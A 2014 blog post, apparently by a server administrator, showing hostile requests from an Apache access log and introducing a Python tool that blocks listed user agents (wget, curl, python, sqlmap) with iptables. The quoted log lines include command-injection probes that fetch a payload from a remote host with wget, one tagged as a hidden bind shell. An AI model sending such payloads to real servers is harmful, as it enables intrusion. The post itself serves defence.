Meine Blog-Liste

  • end of life - Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots h...
    vor 1 Jahr

Sonntag, 5. Oktober 2014

Analyzing Apache Logs [Introducing myPyApacheFW]

There will be no news this weekend.
Last week I did a lot of research regarding Apache and in special Agent information.

I run my own installation of owncloud on one of my virtual servers. When you take a look at the access log, you may find something like:

oc.johest.de:80 1.169.92.235 - - [05/Oct/2014:11:13:49 +0200] "CONNECT mx2.mail2000.com.tw:25 HTTP/1.0" 302 495 "-" "-"
oc.johest.de:80 107.15.13.138 - - [05/Oct/2014:14:46:37 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"
oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
oc.johest.de:443 54.187.189.195 - - [08/Jul/2014:19:08:57 +0200] "GET /admin/config.php HTTP/1.0" 403 9273 "-" "Python-urllib/1.17"
oc.johest.de:443 114.112.100.51 - - [13/Jul/2014:00:09:39 +0200] "GET /admin/config.php HTTP/1.0" 403 9225 "-" "Python-urllib/1.17"
 oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:07:09:53 +0200] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 630 "-" "chroot-apach0day"
oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:20:32:12 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 636 "-" "chroot-apach0day"
oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:23:45:21 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 642 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"


As you can easily see, such a access is not really what you want, There is no need that a mail-server connects to my web-space and I really don't think that i provide a rmUnblock.cgi. Even any connection via Python or curl and Wget seems to be a bit strange.
On a different machine i saw some huge brute-force attacks using Wget.

So what can you do.
First i took a look at all the agent information i have found in my own log files.
It was obvoius that some agents should not be there, so i made a list of them

  • wget
  • curl
  • python
  • sqlmap
  • -
  • apache0day
last one is a not available header, so someone who accessed your page and was not showing the agent information. 
Than i created my own little tool.

MyPyApacheFW

First of all, if it comes down to apache hardening, there are several things you should do, and most of the things will secure your web-service more than my script currently can. So please, if you want to be sure just use
  1. mod_security
  2. mod_evasive
  3. fail2ban
  4. apparmor
and anyway, give my script a try :-)

My script is available on github:


it simply takes an apache access log file as an input, and parses for any regmatch of bad agents and will block them via iptables.
In the the newest version it does support GeoIP for logging also.

So if you have cloned it to your local device, you can simply run
cat /var/log/apache/access.log | python mypyfw.py
and it will work. I will always try to have it backward compatible to the earliest version. So if there are new features they will not be running by defrault and will use extra options. Like:
cat /var/log/apache/access.log | python mypyfw.py -g -t 
Which will perform a logging only run, adding GeoIP information to the logfile.

I added my first addon today, which is really just a few liner to cleanup iptables.
You can find it within the Addon-folder.
mypy-ipfw-cleanup.py
will just go through every rule and delete them if the rule did not receive any package. As a bonus, it will reset the count for every rule to zero. So if you run it every day only active rules will stay on your system.
Usage: mypyfw.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  write report to FILE, default is /var/log/mypyfw.log
  -i IPPOSITION, --ippos=IPPOSITION
                        adjust IP position, default is 0
  -b FILE, --blacklist=FILE
                        path to blacklist, default values are Hardcoded
  -w FILE, --whitelist=FILE
                        path to Whitelist, default values are Hardcoded
  -t, --try-run          you want a test run
  -g, --geoIP           add GeoIP data to output